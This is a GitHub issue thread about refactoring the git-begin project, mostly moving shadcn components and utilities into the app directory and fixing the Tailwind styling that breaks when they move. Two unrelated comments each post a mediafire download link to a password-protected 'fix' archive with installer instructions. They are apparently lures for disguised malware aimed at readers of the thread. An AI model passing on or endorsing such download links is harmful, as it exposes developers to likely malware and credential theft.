### ISSUE TITLE
Refactor project structure

### ISSUE THREAD

**Issue by Sechorda** [The-Enthusiast-404/git-begin#48]
I think this would be a good time in the life cycle of this project to look at refactoring the project structure to help maintainability going forward.

Feel free to assign me!

**Comment by dotslashbit** [comment]
@Sechorda Assigned

Do you have any experience in testing?

**Comment by dotslashbit** [comment]
@Sechorda awesome, I'll see what we can do on testing. Refactoring is priority. So, please take your time and do whatever you can to improve this, just create a draft PR as long as you are not ready for review.

The way to improved the mobile UI is quite impression, thank you so much for contributing to this repository 😊

**Comment by FabrizioValenti** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Sechorda** [comment]
@dotslashbit I'v made some progress here. I think if we migrate all components to /app/components and @/lib/utils.ts to /app/lib/utils.ts we can clean this up quite a bit. 

I'm running into an issue though with anything referencing `import { cn } from "@/lib/utils"`
This slightly breaks the desktop UI filter box and github logo styling - any ideas a quick fix for this? Is it tailwind/CSS inheritance thing?

ty

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dotslashbit** [comment]
I'll have to look into it, so I'll get back to you tomorrow. I hope that's fine

**Comment by Sechorda** [comment]
@dotslashbit np

**Comment by Sechorda** [comment]
@dotslashbit Ok, i'm done for now. If you look at my forked branch for RefactorV1-Components, I have moved every component out of @/components/ui that does not cause tailwind/css breaks.

If this is the direction you want the project structure to go, then maybe this can help you decide how to handle CSS to make it look correct. I think it's worth the effort to get structure set up for the future, and I can begin documenting and testing code.

**Comment by dotslashbit** [comment]
@Sechorda Yes, ideally we should completely put the components and lib inside the app directory. The @ directory is coming from the shadcn UI library.
One more thing, instead of working on the #49 by yourself. I would say let @sanketmn26 work on it and help him in solving this. If he didn't respond then I'll merge your PR (for now just keep it there, I would say put in in draft mode). If he responds, then help him and review his changes.

I hope you'll understand

I have another UI issue for you, let me know if you want to work on it, its related to both web and responsive UI related. Just confirm here and I'll create a issue and assign you, then we can discuss there

**Comment by dotslashbit** [comment]
@Sechorda 
Regarding the cn issue.

The @ direcotry exists because of shadcn, there's also a components.json file thats used for configration of shadcn. I would say look up the docs for setting up shadcn in remix and then you might get your answer.

**Comment by sanketmn26** [comment]
> @Sechorda Yes, ideally we should completely put the components and lib inside the app directory. The @ directory is coming from the shadcn UI library. One more thing, instead of working on the #49 by yourself. I would say let @sanketmn26 work on it and help him in solving this. If he didn't respond then I'll merge your PR (for now just keep it there, I would say put in in draft mode). If he responds, then help him and review his changes.
> 
> I hope you'll understand
> 
> I have another UI issue for you, let me know if you want to work on it, its related to both web and responsive UI related. Just confirm here and I'll create a issue and assign you, then we can discuss there

If @Sechorda has already solved the issue. Then Please merge his PR. I can work on some other issue.

**Comment by dotslashbit** [comment]
Awesome, thanks @sanketmn26 for your cooperation.

**Comment by Sechorda** [comment]
@dotslashbit 

> I have another UI issue for you, let me know if you want to work on it, its related to both web and responsive UI related. Just confirm here and I'll create a issue and assign you, then we can discuss there

I'd be happy to work on it just assign me, ty.

> @Sechorda Regarding the cn issue.

> The @ direcotry exists because of shadcn, there's also a components.json file thats used for configration of shadcn. I would say look up the docs for setting up shadcn in remix and then you might get your answer.

I did some research on shadcn and their docs - apparently this is a very common issue and I found a ton of stackoverflow and reddit posts regarding the same situation we're in. it's an easy fix to migrate now that I understand. I also migrated the `tailswind.config.ts` and `tailwind.config.js` into one file without any harm. Let me know what you think you want to do - I'm a big minimalist and like to organize things, so I can tackle this one.


> If @Sechorda has already solved the issue. Then Please merge his PR. I can work on some other issue.

I converted my PR to a draft PR, since @dotslashbit may want to use a different approach for filtering. Waiting to hear more on that. ty @sanketmn26

**Comment by omjogani** [comment]
@dotslashbit @sanketmn26 I would highly recommend adding tests, Please go ahead and write a Unit test for JUnit. Here is [docs](https://junit.org/junit5/). I'm here to help, let me know in case there is any help needed!

You can also follow TDD (Test-Driven Development), if you need more info or help, do let me know!

**Comment by omjogani** [comment]
Potentially we don't want to write a test for UI at this point. but the writing test for the logic part makes sense at this point.  Utilize Mockito for mocking API response and work with that!

@dotslashbit I would also like to add a running test case in pre-commit rules. so we will ensure that whatever code we have on repo is well tested and all tests are passing.

**Comment by Sechorda** [comment]
@omjogani @dotslashbit 

After a lot of debugging/troubleshooting I can't find an easy way to migrate the components structure from the shadcn components. Everything I try breaks the tailwind css.

hoping you guys can help or we can close the issue.

**Comment by dotslashbit** [comment]
@SechordaI would say keep this issue open, I'll take a look at how to figure this out.

I'll assign you the UI fix that I was talking about l, it's a pretty annoying one

@omjogani Yes I agree we need to add tests for logic mainly filtering l, sorting and api fetching. I would request you to lead and review the tests and let others work on it while you review it, what do you think? Also please create all the test issues with a good first issues label, so that contributors can learn and contribute.

Let me know your thoughts on this

**Comment by Sechorda** [comment]
@dotslashbit I was in the shadcn docs for a bit and am not familiar enough with tailwind configs and how it interacts with shadcn components after the project creation.

I'll need your help to untangle this one please. But the more organized structure will help future contributors.

**Comment by dotslashbit** [comment]
@Sechorda Sure, I understand. I'll take a look at it and then we can continue on this, till then you can start working on something else

**Comment by Sechorda** [comment]
@dotslashbit Let me know if you've had any success merging the components. :D

**Comment by dotslashbit** [comment]
@Sechorda I'll take a look this Sunday

**Comment by dotslashbit** [comment]
@Sechorda I didn't got time to take a look at it today, will do it tomorrow.

Are you working on the desktop search? If not that's fine but please create an issue about it. Thank you 😊

**Comment by Sechorda** [comment]
@dotslashbit don't worry, I didn't forget. I'll create an issue.

I need to know where you think the search bar should go, in the side bar, or above the issues?
